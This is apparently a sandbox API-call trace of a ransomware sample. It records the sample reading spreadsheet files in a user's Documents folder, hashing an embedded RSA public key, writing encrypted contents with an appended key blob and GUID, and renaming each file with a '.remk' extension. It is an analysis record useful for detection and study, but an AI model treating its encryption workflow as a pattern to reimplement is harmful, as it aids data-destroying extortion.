hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d100 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.842] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x115bd, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x115bd, lpOverlapped=0x0) returned 1 [0235.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.843] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x115c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.843] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.844] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.844] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.844] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.844] CloseHandle (hObject=0x640) returned 1 [0235.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0235.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0235.846] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6cca_ ZmPO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6cca_ zmpo.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6cca_ ZmPO.ods.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6cca_ zmpo.ods.remk")) returned 1 [0235.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.848] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.849] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d70c830, ftCreationTime.dwHighDateTime=0x1d5df3b, ftLastAccessTime.dwLowDateTime=0x1063d960, ftLastAccessTime.dwHighDateTime=0x1d5d983, ftLastWriteTime.dwLowDateTime=0x1063d960, ftLastWriteTime.dwHighDateTime=0x1d5d983, nFileSizeHigh=0x0, nFileSizeLow=0x148d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6jPQDPh.ods", cAlternateFileName="")) returned 1 [0235.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0235.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0235.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0235.849] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6jPQDPh.ods") returned=".ods" [0235.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6jPQDPh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6jpqdph.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.850] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=84176) returned 1 [0235.850] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.853] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x148aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.853] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.855] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.855] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x148d0, lpOverlapped=0x0) returned 1 [0235.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.857] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.858] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.858] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.858] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.858] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.858] GetLastError () returned 0x0 [0235.858] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.858] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.858] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.858] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.858] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148d0) returned 0x37c6278 [0235.859] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d100 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d148 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.860] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5a0 [0235.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc588 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.861] GetCurrentThreadId () returned 0x314 [0235.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4f80 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.862] GetCurrentThreadId () returned 0x314 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.862] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.863] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.863] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc618 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5b8 [0235.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 